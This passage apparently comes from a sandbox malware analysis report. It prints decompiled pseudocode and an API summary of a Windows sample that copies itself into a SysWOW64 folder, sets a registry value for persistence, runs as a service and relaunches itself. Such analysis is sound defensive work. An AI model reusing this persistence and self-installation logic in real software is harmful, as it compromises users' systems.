                                                                                				char _t402;
                                                                                				char _t403;
                                                                                				intOrPtr* _t410;
                                                                                				void* _t411;
                                                                                				char _t417;
                                                                                				char _t418;
                                                                                				void* _t424;
                                                                                				intOrPtr _t426;
                                                                                				void* _t428;
                                                                                				char* _t436;
                                                                                				intOrPtr _t441;
                                                                                				CHAR* _t442;
                                                                                				void* _t450;
                                                                                				void* _t451;
                                                                                				char _t459;
                                                                                				void* _t464;
                                                                                				void* _t465;
                                                                                				void* _t467;
                                                                                				void* _t468;
                                                                                				void* _t469;
                                                                                				void* _t470;
                                                                                				void* _t471;
                                                                                				void* _t474;
                                                                                				intOrPtr _t475;
                                                                                
                                                                                				SetErrorMode(3); // executed
                                                                                				SetErrorMode(3); // executed
                                                                                				SetUnhandledExceptionFilter(E00126511); // executed
                                                                                				E0012EC54(); // executed
                                                                                				_t475 =  *0x13201f; // 0x1
                                                                                				if(_t475 != 0) {
                                                                                					__eflags =  *0x1333d8; // 0x0
                                                                                					if(__eflags == 0) {
                                                                                						L126:
                                                                                						CreateThread(0, 0, E0012405E, 0, 0, 0); // executed
                                                                                						__imp__#115(0x1010,  &_v1672); // executed
                                                                                						E0012E52E(_t449, __eflags);
                                                                                						E0012EAAF(1, 0);
                                                                                						E00121D96(_t438, 0x132118);
                                                                                						E001280C9(_t438); // executed
                                                                                						CreateThread(0, 0, E0012877E, 0, 0, 0); // executed
                                                                                						E00125E6C(__eflags);
                                                                                						E00123132();
                                                                                						E0012C125(__eflags);
                                                                                						E00128DB1(_t438);
                                                                                						Sleep(0xbb8); // executed
                                                                                						E0012C4EE();
                                                                                						while(1) {
                                                                                							__eflags =  *0x1333d0; // 0x0
                                                                                							if(__eflags == 0) {
                                                                                								goto L129;
                                                                                							}
                                                                                							_t239 = GetTickCount();
                                                                                							__eflags = _t239 -  *0x1333d0 - 0x109a0;
                                                                                							if(_t239 -  *0x1333d0 < 0x109a0) {
                                                                                								L131:
                                                                                								Sleep(0x1a90); // executed
                                                                                								continue;
                                                                                							}
                                                                                							L129:
                                                                                							_t238 = E0012C913(); // executed
                                                                                							__eflags = _t238;
                                                                                							if(_t238 == 0) {
                                                                                								 *0x1333d0 = GetTickCount();
                                                                                							}
                                                                                							goto L131;
                                                                                						}
                                                                                					}
                                                                                					_a12 = 0xa;
                                                                                					while(1) {
                                                                                						_t242 = DeleteFileA(0x1333d8); // executed
                                                                                						__eflags = _t242;
                                                                                						if(_t242 != 0) {
                                                                                							break;
                                                                                						}
                                                                                						__eflags = _a12;
                                                                                						if(_a12 <= 0) {
                                                                                							break;
                                                                                						}
                                                                                						_t244 = GetLastError();
                                                                                						__eflags = _t244 - 2;
                                                                                						if(_t244 == 2) {
                                                                                							break;
                                                                                						}
                                                                                						_t219 =  &_a12;
                                                                                						 *_t219 = _a12 - 1;
                                                                                						__eflags =  *_t219;
                                                                                						Sleep(0x3e8);
                                                                                					}
                                                                                					E0012EE2A(_t438, 0x1333d8, 0, 0x104);
                                                                                					_t465 = _t465 + 0xc;
                                                                                					goto L126;
                                                                                				} else {
                                                                                					_v12 = 0;
                                                                                					if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) == 0) {
                                                                                						_v672 = 0;
                                                                                					}
                                                                                					if(_v672 == 0x22) {
                                                                                						E0012EF00( &_v672,  &_v671);
                                                                                						_t436 = E0012ED23( &_v672, 0x22);
                                                                                						_t465 = _t465 + 0x10;
                                                                                						if(_t436 != 0) {
                                                                                							 *_t436 = 0;
                                                                                						}
                                                                                					}
                                                                                					_t248 = GetCommandLineA();
                                                                                					_t459 = 0x1322f8;
                                                                                					_a12 = _t248;
                                                                                					_t250 = E0012EE95(_a12, E00122544(0x1322f8, 0x130a48, 4, 0xe4, 0xc8));
                                                                                					_t454 = 0x100;
                                                                                					_v8 = _t250;
                                                                                					E0012EE2A(_t438, 0x1322f8, 0, 0x100);
                                                                                					_t467 = _t465 + 0x28;
                                                                                					if(_v8 == 0) {
                                                                                						_t257 = E001296AA( &_v672,  &_v48,  &_v44,  &_v372,  &_v112);
                                                                                						_t467 = _t467 + 0x14;
                                                                                						_v16 = _t257;
                                                                                						if(_t257 == 0) {
                                                                                							E0012EF00("C:\\Windows\\SysWOW64\\htdzdeug\\qbxctmyn.exe",  &_v672);
                                                                                							_pop(_t438);
                                                                                							_a12 = GetCommandLineA();
                                                                                							_v8 = E0012EE95(_a12, E00122544(0x1322f8, 0x130a38, 4, 0xe4, 0xc8));
                                                                                							E0012EE2A(_t438, 0x1322f8, 0, 0x100);
                                                                                							_t468 = _t467 + 0x28;
                                                                                							__eflags = _v8;
                                                                                							if(_v8 == 0) {
                                                                                								L102:
                                                                                								_v8 = E0012EE95(_a12, E00122544(_t459, 0x130a28, 4, 0xe4, 0xc8));
                                                                                								E0012EE2A(_t438, _t459, 0, _t454);
                                                                                								_t467 = _t468 + 0x28;
                                                                                								__eflags = _v8;
                                                                                								if(_v8 == 0) {
                                                                                									L110:
                                                                                									_t267 = E00126EC3();
                                                                                									__eflags = _t267;
                                                                                									if(_t267 != 0) {
                                                                                										E001298F2(_t438);
                                                                                										L19:
                                                                                										ExitProcess(0);
                                                                                									}
                                                                                									__eflags = _v372;
                                                                                									if(_v372 == 0) {
                                                                                										L116:
                                                                                										 *0x1333b0 = 0;
                                                                                										L117:
                                                                                										_v64.hProcess =  &_v372;
                                                                                										_v64.hThread = E00129961;
                                                                                										_v64.dwProcessId = 0;
                                                                                										_v64.dwThreadId = 0;
                                                                                										StartServiceCtrlDispatcherA( &_v64);
                                                                                										goto L19;
                                                                                									}
                                                                                									_t272 =  &_v372;
                                                                                									_t449 = _t272 + 1;
                                                                                									do {
                                                                                										_t438 =  *_t272;
                                                                                										_t272 = _t272 + 1;
                                                                                										__eflags = _t438;
                                                                                									} while (_t438 != 0);
                                                                                									__eflags = _t272 - _t449 - 0x20;
                                                                                									if(_t272 - _t449 >= 0x20) {
                                                                                										goto L116;
                                                                                									}
                                                                                									E0012EF00("htdzdeug",  &_v372);
                                                                                									_pop(_t438);
                                                                                									goto L117;
                                                                                								}
                                                                                								_t459 = _v8 + 3;
                                                                                								_t276 = E0012ED03(_t459, 0x20);
                                                                                								_pop(_t438);
                                                                                								__eflags = _t276;
                                                                                								if(_t276 != 0) {
                                                                                									L107:
                                                                                									_t454 = _t276 - _t459;
                                                                                									__eflags = _t454 - 0x20;
                                                                                									if(_t454 >= 0x20) {
                                                                                										_t454 = 0x1f;
                                                                                									}
                                                                                									E0012EE08(0x132184, _t459, _t454);
                                                                                									_t467 = _t467 + 0xc;
                                                                                									 *((char*)(_t454 + 0x132184)) = 0;
                                                                                									goto L110;
                                                                                								}
                                                                                								_t279 = _t459;
                                                                                								_t449 = _t279 + 1;
                                                                                								do {
                                                                                									_t438 =  *_t279;
                                                                                									_t279 = _t279 + 1;
                                                                                									__eflags = _t438;
                                                                                								} while (_t438 != 0);
                                                                                								_t276 = _t279 - _t449 + _t459;
                                                                                								__eflags = _t276;
                                                                                								goto L107;
                                                                                							}
                                                                                							_t282 = _v8 + 3;
                                                                                							_v672 = 0;
                                                                                							__eflags =  *_t282 - 0x22;
                                                                                							_v20 = _t282;
                                                                                							if( *_t282 != 0x22) {
                                                                                								_t283 = E0012ED03(_v20, 0x20);
                                                                                								_pop(_t438);
                                                                                								__eflags = _t283;
                                                                                								if(_t283 == 0) {
                                                                                									_t283 =  &(_a12[lstrlenA(_a12)]);
                                                                                									__eflags = _t283;
                                                                                								}
                                                                                								_t284 = _t283 - _v8;
                                                                                								_v24 = _t284;
                                                                                								__eflags = _t284 + 0xfffffffd;
                                                                                								E0012EE08( &_v672, _v20, _t284 + 0xfffffffd);
                                                                                								 *((char*)(_t464 + _v24 - 0x29f)) = 0;
                                                                                								L98:
                                                                                								_t468 = _t468 + 0xc;
                                                                                								L99:
                                                                                								__eflags = _v672;
                                                                                								if(_v672 != 0) {
                                                                                									E0012EE08(0x1333d8,  &_v672, 0x103);
                                                                                									_t468 = _t468 + 0xc;
                                                                                								}
                                                                                								 *0x132cc0 = 1;
                                                                                								goto L102;
                                                                                							}
                                                                                							_v20 = _v8 + 4;
                                                                                							_t294 = E0012ED03(_v8 + 4, 0x22);
                                                                                							_pop(_t438);
                                                                                							__eflags = _t294;
                                                                                							if(_t294 == 0) {
                                                                                								goto L99;
                                                                                							}
                                                                                							_v24 = _t294 - _v8;
                                                                                							E0012EE08( &_v672, _v20, _t294 - _v8 + 0xfffffffc);
                                                                                							 *((char*)(_t464 + _v24 - 0x2a0)) = 0;
                                                                                							goto L98;
                                                                                						}
                                                                                						_v36 = 0;
                                                                                						if(_t257 >= 4 || _v48 > 0x61 && _v44 != 0) {
                                                                                							L84:
                                                                                							if(GetModuleFileNameA(GetModuleHandleA(0),  &_v672, 0x12c) != 0) {
                                                                                								_t303 =  &_v672;
                                                                                								if(_v672 == 0x22) {
                                                                                									_t303 =  &_v671;
                                                                                								}
                                                                                								if(_t303[1] == 0x3a && _t303[2] == 0x5c) {
                                                                                									_t303[3] = 0;
                                                                                									_t304 = GetDriveTypeA(_t303);
                                                                                									_t515 = _t304 - 2;
                                                                                									if(_t304 != 2) {
                                                                                										E00129145(_t515);
                                                                                										_t438 = 1;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                							goto L19;
                                                                                						} else {
                                                                                							E00124280(_t438, 1);
                                                                                							_pop(_t438);
                                                                                							if(_v672 == 0) {
                                                                                								goto L84;
                                                                                							}
                                                                                							_t309 = E0012675C( &_v672,  &_v12, 0);
                                                                                							_t467 = _t467 + 0xc;
                                                                                							_v8 = _t309;
                                                                                							if(_t309 == 0 || _v12 == 0) {
                                                                                								goto L84;
                                                                                							} else {
                                                                                								_v32 = 0;
                                                                                								_v28 = 0;
                                                                                								if(_v16 == 2) {
                                                                                									L55:
                                                                                									__eflags = _v16 - 3;
                                                                                									if(_v16 >= 3) {
                                                                                										L83:
                                                                                										E0012EC2E(_v8);
                                                                                										_pop(_t438);
                                                                                										if(_v36 != 0) {
                                                                                											goto L19;
                                                                                										}
                                                                                										goto L84;
                                                                                									}
                                                                                									_t312 = E00122544(_t459, 0x130a3c, 0xc, 0xe4, 0xc8);
                                                                                									_t469 = _t467 + 0x14;
                                                                                									__eflags = GetEnvironmentVariableA(_t312,  &_v1272, 0x1f4);
                                                                                									if(__eflags == 0) {
                                                                                										L82:
                                                                                										E0012EE2A(_t438, _t459, 0, _t454);
                                                                                										_t467 = _t469 + 0xc;
                                                                                										goto L83;
                                                                                									}
                                                                                									_t318 = E001299D2(_t449, __eflags,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                									_t469 = _t469 + 0x14;
                                                                                									__eflags = _t318;
                                                                                									if(_t318 == 0) {
                                                                                										goto L82;
                                                                                									}
                                                                                									E0012EE2A(_t438, _t459, 0, _t454);
                                                                                									_t470 = _t469 + 0xc;
                                                                                									_v1272 = 0x22;
                                                                                									lstrcpyA( &_v1271,  &_v672);
                                                                                									_t324 = lstrlenA( &_v1272);
                                                                                									 *((char*)(_t464 + _t324 - 0x4f4)) = 0x22;
                                                                                									_t325 = _t324 + 1;
                                                                                									__eflags = _v16 - 2;
                                                                                									_a12 = _t325;
                                                                                									 *((char*)(_t464 + _t325 - 0x4f4)) = 0;
                                                                                									if(_v16 != 2) {
                                                                                										L60:
                                                                                										_push(0);
                                                                                										_push( &_v112);
                                                                                										_t328 = E00126DC2(_t438) ^ 0x61616161;
                                                                                										__eflags = _t328;
                                                                                										_push(_t328);
                                                                                										E0012F133();
                                                                                										_t470 = _t470 + 0xc;
                                                                                										L61:
                                                                                										_t331 = E00122544(_t459,  &E001306AC, 0x2e, 0xe4, 0xc8);
                                                                                										_t471 = _t470 + 0x14;
                                                                                										_t332 = RegOpenKeyExA(0x80000001, _t331, 0, 0x103,  &_v24);
                                                                                										_v20 = _t332;
                                                                                										__eflags = _t332;
                                                                                										if(_t332 == 0) {
                                                                                											_t373 =  &(_a12[1]);
                                                                                											__eflags = _t373;
                                                                                											_v20 = RegSetValueExA(_v24,  &_v112, 0, 1,  &_v1272, _t373);
                                                                                											RegCloseKey(_v24);
                                                                                										}
                                                                                										E0012EE2A(_t438, _t459, 0, _t454);
                                                                                										E0012EE2A(_t438,  &_v772, 0, 0x44);
                                                                                										_v772.cb = 0x44;
                                                                                										E0012EE2A(_t438,  &_v64, 0, 0x10);
                                                                                										_t469 = _t471 + 0x24;
                                                                                										_t340 = GetModuleFileNameA(GetModuleHandleA(0),  &_v372, 0x104);
                                                                                										__eflags = _t340;
                                                                                										if(_t340 != 0) {
                                                                                											__eflags = _v372 - 0x22;
                                                                                											_t357 =  &_v372;
                                                                                											_v40 = _t357;
                                                                                											if(_v372 == 0x22) {
                                                                                												_t357 =  &_v371;
                                                                                												_v40 = _t357;
                                                                                											}
                                                                                											__eflags =  *((char*)(_t357 + 1)) - 0x3a;
                                                                                											if( *((char*)(_t357 + 1)) == 0x3a) {
                                                                                												__eflags =  *((char*)(_t357 + 2)) - 0x5c;
                                                                                												if( *((char*)(_t357 + 2)) == 0x5c) {
                                                                                													_t358 = _v40;
                                                                                													_t438 = _t358[3];
                                                                                													_a15 = _t358[3];
                                                                                													_t358[3] = 0;
                                                                                													_t359 = GetDriveTypeA(_t358);
                                                                                													__eflags = _t359 - 2;
                                                                                													if(_t359 != 2) {
                                                                                														_t438 = _v40;
                                                                                														_v40[3] = _a15;
                                                                                														lstrcatA( &_v1272, E00122544(_t459, 0x130a38, 4, 0xe4, 0xc8));
                                                                                														E0012EE2A(_v40, _t459, 0, _t454);
                                                                                														_t469 = _t469 + 0x20;
                                                                                														__eflags = _v372 - 0x22;
                                                                                														if(_v372 != 0x22) {
                                                                                															lstrcatA( &_v1272, "\"");
                                                                                														}
                                                                                														lstrcatA( &_v1272,  &_v372);
                                                                                														__eflags = _v372 - 0x22;
                                                                                														if(_v372 != 0x22) {
                                                                                															lstrcatA( &_v1272, "\"");
                                                                                														}
                                                                                														_v36 = 1;
                                                                                													}
                                                                                												}
                                                                                											}
                                                                                										}
                                                                                										__eflags = _v32;
                                                                                										if(_v32 != 0) {
                                                                                											__eflags = _v28;
                                                                                											if(_v28 != 0) {
                                                                                												wsprintfA( &_v372, "%X%08X", _v28, _v32);
                                                                                												lstrcatA( &_v1272, E00122544(_t459, 0x130a28, 4, 0xe4, 0xc8));
                                                                                												E0012EE2A(_t438, _t459, 0, _t454);
                                                                                												_t469 = _t469 + 0x30;
                                                                                												lstrcatA( &_v1272,  &_v372);
                                                                                											}
                                                                                										}
                                                                                										_t344 = CreateProcessA(0,  &_v1272, 0, 0, 0, 0x8000000, 0, 0,  &_v772,  &_v64);
                                                                                										__eflags = _t344;
                                                                                										if(_t344 == 0) {
                                                                                											DeleteFileA( &_v672);
                                                                                											_v36 = 0;
                                                                                										}
                                                                                										__eflags = _v16 - 1;
                                                                                										if(_v16 == 1) {
                                                                                											__eflags = _v20;
                                                                                											if(_v20 == 0) {
                                                                                												E001296FF(_t438);
                                                                                											}
                                                                                										}
                                                                                										goto L82;
                                                                                									}
                                                                                									__eflags = _v112;
                                                                                									if(_v112 != 0) {
                                                                                										goto L61;
                                                                                									}
                                                                                									goto L60;
                                                                                								}
                                                                                								_t379 = GetTempPathA(0x1f4,  &_v1272);
                                                                                								_t494 = _t379;
                                                                                								if(_t379 == 0) {
                                                                                									goto L55;
                                                                                								}
                                                                                								_t383 = E001299D2(_t449, _t494,  &_v1272,  &_v672,  &_v704, _v8, _v12);
                                                                                								_t467 = _t467 + 0x14;
                                                                                								if(_t383 == 0) {
                                                                                									goto L55;
                                                                                								}
                                                                                								_v80 = 0;
                                                                                								if(_v16 < 3 || _v372 == 0) {
                                                                                									_push(0);
                                                                                									_push( &_v80);
                                                                                									_push(E00126DC2(_t438) ^ 0x61616161);
                                                                                									E0012F133();
                                                                                									_t474 = _t467 + 0xc;
                                                                                									lstrcpyA( &_v372, E00126CC9(_t438));
                                                                                									lstrcatA( &_v372,  &_v80);
                                                                                									lstrcatA( &_v372,  &E0013070C);
                                                                                									_t396 = 0;
                                                                                									__eflags = 0;
                                                                                									goto L43;
                                                                                								} else {
                                                                                									_t410 =  &_v372;
                                                                                									_t450 = _t410 + 1;
                                                                                									do {
                                                                                										_t441 =  *_t410;
                                                                                										_t410 = _t410 + 1;
                                                                                									} while (_t441 != 0);
                                                                                									_t411 = _t410 - _t450;
                                                                                									if(_t411 > 0 &&  *((char*)(_t464 + _t411 - 0x171)) == 0x5c) {
                                                                                										_t411 = _t411 - 1;
                                                                                									}
                                                                                									_t451 = _t411;
                                                                                									if(_t411 <= 0) {
                                                                                										L41:
                                                                                										_t449 = _t451 - _t411;
                                                                                										_a12 = _t451 - _t411;
                                                                                										E0012EE08( &_v80, _t464 + _t411 - 0x170, _t451 - _t411);
                                                                                										 *((char*)(_t464 + _a12 - 0x4c)) = 0;
                                                                                										_t474 = _t467 + 0xc;
                                                                                										_t396 = 1;
                                                                                										L43:
                                                                                										if(_v44 == 0 || _v48 < 0x50) {
                                                                                											_t438 = 1;
                                                                                											__eflags = 1;
                                                                                										} else {
                                                                                											_t438 = 0;
                                                                                										}
                                                                                										_push(_t438);
                                                                                										_push(_t396);
                                                                                										_push( &_v372);
                                                                                										_push( &_v80);
                                                                                										_push( &_v672);
                                                                                										_push( &_v704);
                                                                                										_t401 = E00129326(_t438, _t449);
                                                                                										_t467 = _t474 + 0x18;
                                                                                										if(_t401 == 0) {
                                                                                											_t402 =  *0x13217c; // 0x0
                                                                                											_v32 = _t402;
                                                                                											_t403 =  *0x132180; // 0x0
                                                                                											goto L54;
                                                                                										} else {
                                                                                											if(GetFileAttributesExA( &_v672, 0,  &(_v772.dwXCountChars)) != 0) {
                                                                                												_t403 = 0x61040108;
                                                                                												 *0x132180 = 0x61040108;
                                                                                												 *0x13217c = 0;
                                                                                												_v32 = 0;
                                                                                												L54:
                                                                                												_v28 = _t403;
                                                                                												DeleteFileA( &_v672);
                                                                                												goto L55;
                                                                                											}
                                                                                											_t459 = 1;
                                                                                											if(_v16 == 1) {
                                                                                												E001296FF(_t438);
                                                                                											}
                                                                                											_v36 = _t459;
                                                                                											goto L83;
                                                                                										}
                                                                                									} else {
                                                                                										_t442 =  &_v372;
                                                                                										while( *((char*)(_t442 + _t411 - 1)) != 0x5c) {
                                                                                											_t411 = _t411 - 1;
                                                                                											if(_t411 > 0) {
                                                                                												continue;
                                                                                											}
                                                                                											goto L41;
                                                                                										}
                                                                                										goto L41;
                                                                                									}
                                                                                								}
                                                                                							}
                                                                                						}
                                                                                					}
                                                                                					_t417 = _v8;
                                                                                					_t454 = _t417 + 3;
                                                                                					_v372 = 0;
                                                                                					if( *((char*)(_t417 + 3)) != 0x22) {
                                                                                						_t418 = E0012ED03(_t454, 0x20);
                                                                                						_pop(_t438);
                                                                                						__eflags = _t418;
                                                                                						if(_t418 == 0) {
                                                                                							_t418 =  &(_a12[lstrlenA(_a12)]);
                                                                                							__eflags = _t418;
                                                                                						}
                                                                                						_t459 = _t418 - _v8;
                                                                                						__eflags = _t459;
                                                                                						E0012EE08( &_v372, _t454, _t459 - 3);
                                                                                						 *((char*)(_t464 + _t459 - 0x173)) = 0;
                                                                                						L13:
                                                                                						_t467 = _t467 + 0xc;
                                                                                						L14:
                                                                                						if(_v372 != 0 && _v672 != 0) {
                                                                                							_t424 = E0012675C( &_v672,  &_v12, 0);
                                                                                							_t467 = _t467 + 0xc;
                                                                                							if(_t424 != 0 && _v12 != 0) {
                                                                                								_t426 = E00126A60(_t449,  &_v372, _t424, _v12);
                                                                                								_t467 = _t467 + 0xc;
                                                                                								_v12 = _t426;
                                                                                							}
                                                                                						}
                                                                                						goto L19;
                                                                                					}
                                                                                					_t454 = _t417 + 4;
                                                                                					_t428 = E0012ED03(_t417 + 4, 0x22);
                                                                                					_pop(_t438);
                                                                                					if(_t428 == 0) {
                                                                                						goto L14;
                                                                                					} else {
                                                                                						_t459 = _t428 - _v8;
                                                                                						E0012EE08( &_v372, _t454, _t459 - 4);
                                                                                						 *((char*)(_t464 + _t459 - 0x174)) = 0;
                                                                                						goto L13;
                                                                                					}
                                                                                				}
                                                                                			}
                                                                                0x0012a374
                                                                                0x0012a376
                                                                                0x0012a377
                                                                                0x0012a377
                                                                                0x0012a37d
                                                                                0x0012a380
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a38e
                                                                                0x0012a394
                                                                                0x00000000
                                                                                0x0012a394
                                                                                0x0012a318
                                                                                0x0012a31e
                                                                                0x0012a324
                                                                                0x0012a325
                                                                                0x0012a327
                                                                                0x0012a339
                                                                                0x0012a33b
                                                                                0x0012a33d
                                                                                0x0012a340
                                                                                0x0012a344
                                                                                0x0012a344
                                                                                0x0012a34c
                                                                                0x0012a351
                                                                                0x0012a354
                                                                                0x00000000
                                                                                0x0012a354
                                                                                0x0012a329
                                                                                0x0012a32b
                                                                                0x0012a32e
                                                                                0x0012a32e
                                                                                0x0012a330
                                                                                0x0012a331
                                                                                0x0012a331
                                                                                0x0012a337
                                                                                0x0012a337
                                                                                0x00000000
                                                                                0x0012a337
                                                                                0x0012a228
                                                                                0x0012a22b
                                                                                0x0012a231
                                                                                0x0012a234
                                                                                0x0012a237
                                                                                0x0012a27a
                                                                                0x0012a280
                                                                                0x0012a281
                                                                                0x0012a283
                                                                                0x0012a28e
                                                                                0x0012a28e
                                                                                0x0012a28e
                                                                                0x0012a291
                                                                                0x0012a294
                                                                                0x0012a297
                                                                                0x0012a2a5
                                                                                0x0012a2ad
                                                                                0x0012a2b4
                                                                                0x0012a2b4
                                                                                0x0012a2b7
                                                                                0x0012a2b7
                                                                                0x0012a2bd
                                                                                0x0012a2d0
                                                                                0x0012a2d5
                                                                                0x0012a2d5
                                                                                0x0012a2d8
                                                                                0x00000000
                                                                                0x0012a2d8
                                                                                0x0012a242
                                                                                0x0012a245
                                                                                0x0012a24b
                                                                                0x0012a24c
                                                                                0x0012a24e
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a253
                                                                                0x0012a264
                                                                                0x0012a26c
                                                                                0x00000000
                                                                                0x0012a26c
                                                                                0x00129c39
                                                                                0x00129c3f
                                                                                0x0012a167
                                                                                0x0012a183
                                                                                0x0012a190
                                                                                0x0012a196
                                                                                0x0012a198
                                                                                0x0012a198
                                                                                0x0012a1a2
                                                                                0x0012a1b3
                                                                                0x0012a1b6
                                                                                0x0012a1bc
                                                                                0x0012a1bf
                                                                                0x0012a1c7
                                                                                0x0012a1cc
                                                                                0x0012a1cc
                                                                                0x0012a1bf
                                                                                0x0012a1a2
                                                                                0x00000000
                                                                                0x00129c54
                                                                                0x00129c56
                                                                                0x00129c5b
                                                                                0x00129c62
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129c74
                                                                                0x00129c79
                                                                                0x00129c7c
                                                                                0x00129c81
                                                                                0x00000000
                                                                                0x00129c90
                                                                                0x00129c94
                                                                                0x00129c97
                                                                                0x00129c9a
                                                                                0x00129e3e
                                                                                0x00129e3e
                                                                                0x00129e42
                                                                                0x0012a155
                                                                                0x0012a158
                                                                                0x0012a15d
                                                                                0x0012a161
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x0012a161
                                                                                0x00129e66
                                                                                0x00129e6b
                                                                                0x00129e75
                                                                                0x00129e77
                                                                                0x0012a14a
                                                                                0x0012a14d
                                                                                0x0012a152
                                                                                0x00000000
                                                                                0x0012a152
                                                                                0x00129e98
                                                                                0x00129e9d
                                                                                0x00129ea0
                                                                                0x00129ea2
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129eab
                                                                                0x00129eb0
                                                                                0x00129ec1
                                                                                0x00129ec8
                                                                                0x00129ed5
                                                                                0x00129edb
                                                                                0x00129ee3
                                                                                0x00129ee4
                                                                                0x00129ee8
                                                                                0x00129eeb
                                                                                0x00129ef2
                                                                                0x00129ef9
                                                                                0x00129efc
                                                                                0x00129efd
                                                                                0x00129f03
                                                                                0x00129f03
                                                                                0x00129f08
                                                                                0x00129f09
                                                                                0x00129f0e
                                                                                0x00129f11
                                                                                0x00129f2d
                                                                                0x00129f32
                                                                                0x00129f3b
                                                                                0x00129f41
                                                                                0x00129f44
                                                                                0x00129f46
                                                                                0x00129f4b
                                                                                0x00129f4b
                                                                                0x00129f67
                                                                                0x00129f6a
                                                                                0x00129f6a
                                                                                0x00129f73
                                                                                0x00129f82
                                                                                0x00129f8e
                                                                                0x00129f98
                                                                                0x00129f9d
                                                                                0x00129fb4
                                                                                0x00129fba
                                                                                0x00129fbc
                                                                                0x00129fc2
                                                                                0x00129fc9
                                                                                0x00129fcf
                                                                                0x00129fd2
                                                                                0x00129fd4
                                                                                0x00129fda
                                                                                0x00129fda
                                                                                0x00129fdd
                                                                                0x00129fe1
                                                                                0x00129fe7
                                                                                0x00129feb
                                                                                0x00129ff1
                                                                                0x00129ff4
                                                                                0x00129ff8
                                                                                0x00129ffb
                                                                                0x00129ffe
                                                                                0x0012a004
                                                                                0x0012a007
                                                                                0x0012a010
                                                                                0x0012a025
                                                                                0x0012a038
                                                                                0x0012a041
                                                                                0x0012a046
                                                                                0x0012a049
                                                                                0x0012a050
                                                                                0x0012a05e
                                                                                0x0012a05e
                                                                                0x0012a072
                                                                                0x0012a078
                                                                                0x0012a07f
                                                                                0x0012a08d
                                                                                0x0012a08d
                                                                                0x0012a093
                                                                                0x0012a093
                                                                                0x0012a007
                                                                                0x00129feb
                                                                                0x00129fe1
                                                                                0x0012a09a
                                                                                0x0012a09d
                                                                                0x0012a09f
                                                                                0x0012a0a2
                                                                                0x0012a0b6
                                                                                0x0012a0de
                                                                                0x0012a0e7
                                                                                0x0012a0ec
                                                                                0x0012a0fd
                                                                                0x0012a0fd
                                                                                0x0012a0a2
                                                                                0x0012a120
                                                                                0x0012a126
                                                                                0x0012a128
                                                                                0x0012a131
                                                                                0x0012a137
                                                                                0x0012a137
                                                                                0x0012a13a
                                                                                0x0012a13e
                                                                                0x0012a140
                                                                                0x0012a143
                                                                                0x0012a145
                                                                                0x0012a145
                                                                                0x0012a143
                                                                                0x00000000
                                                                                0x0012a13e
                                                                                0x00129ef4
                                                                                0x00129ef7
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129ef7
                                                                                0x00129cac
                                                                                0x00129cb2
                                                                                0x00129cb4
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129cd5
                                                                                0x00129cda
                                                                                0x00129cdf
                                                                                0x00000000
                                                                                0x00000000
                                                                                0x00129ce9
                                                                                0x00129cec
                                                                                0x00129d58
                                                                                0x00129d59
                                                                                0x00129d64
                                                                                0x00129d65
                                                                                0x00129d6a
                                                                                0x00129d7a
                                                                                0x00129d8b
                                                                                0x00129d9d
                                                                                0x00129da3
                                                                                0x00129da3
                                                                                0x00000000
                                                                                0x00129cf6
                                                                                0x00129cf6
                                                                                0x00129cfc
                                                                                0x00129cff
                                                                                0x00129cff
                                                                                0x00129d01
                                                                                0x00129d02
                                                                                0x00129d06
                                                                                0x00129d0a
                                                                                0x00129d16
                                                                                0x00129d16
                                                                                0x00129d17
                                                                                0x00129d1b
                                                                                0x00129d2f
                                                                                0x00129d2f
                                                                                0x00129d3e
                                                                                0x00129d41
                                                                                0x00129d49
                                                                                0x00129d4f
                                                                                0x00129d52
                                                                                0x00129da5
                                                                                0x00129da8
                                                                                0x00129db6
                                                                                0x00129db6
                                                                                0x00129db0
                                                                                0x00129db0
                                                                                0x00129db0
                                                                                0x00129db7
                                                                                0x00129db8
                                                                                0x00129dbf
                                                                                0x00129dc3
                                                                                0x00129dca
                                                                                0x00129dd1
                                                                                0x00129dd2
                                                                                0x00129dd7
                                                                                0x00129ddc
                                                                                0x00129e21
                                                                                0x00129e26

                                                                                APIs
                                                                                • SetErrorMode.KERNEL32(00000003), ref: 00129A7F
                                                                                • SetErrorMode.KERNEL32(00000003), ref: 00129A83
                                                                                • SetUnhandledExceptionFilter.KERNEL32(00126511), ref: 00129A8A
                                                                                  • Part of subcall function 0012EC54: GetSystemTimeAsFileTime.KERNEL32(?), ref: 0012EC5E
                                                                                  • Part of subcall function 0012EC54: GetVolumeInformationA.KERNEL32(00000000,00000000,00000004,?,00000000,00000000,00000000,00000000), ref: 0012EC72
                                                                                  • Part of subcall function 0012EC54: GetTickCount.KERNEL32 ref: 0012EC78
                                                                                • GetModuleHandleA.KERNEL32(00000000,?,0000012C), ref: 00129AB3
                                                                                • GetModuleFileNameA.KERNEL32(00000000), ref: 00129ABA
                                                                                • GetCommandLineA.KERNEL32 ref: 00129AFD
                                                                                • lstrlenA.KERNEL32(?), ref: 00129B99
                                                                                • ExitProcess.KERNEL32 ref: 00129C06
                                                                                • GetTempPathA.KERNEL32(000001F4,?), ref: 00129CAC
                                                                                • lstrcpyA.KERNEL32(?,00000000), ref: 00129D7A
                                                                                • lstrcatA.KERNEL32(?,?), ref: 00129D8B
                                                                                • lstrcatA.KERNEL32(?,0013070C), ref: 00129D9D
                                                                                • GetFileAttributesExA.KERNEL32(00000022,00000000,?), ref: 00129DED
                                                                                • DeleteFileA.KERNEL32(00000022), ref: 00129E38
                                                                                • GetEnvironmentVariableA.KERNEL32(00000000,?,?,?,?,000001F4), ref: 00129E6F
                                                                                • lstrcpyA.KERNEL32(?,00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00129EC8
                                                                                • lstrlenA.KERNEL32(00000022,?,?,?,?,?,?,?,?,?,?,?,?,000001F4), ref: 00129ED5
                                                                                • RegOpenKeyExA.ADVAPI32(80000001,00000000,?,?,00000000,00000103,?), ref: 00129F3B
                                                                                • RegSetValueExA.ADVAPI32(?,?,00000000,00000001,00000022,?,?,?,00000000,00000103,?), ref: 00129F5E
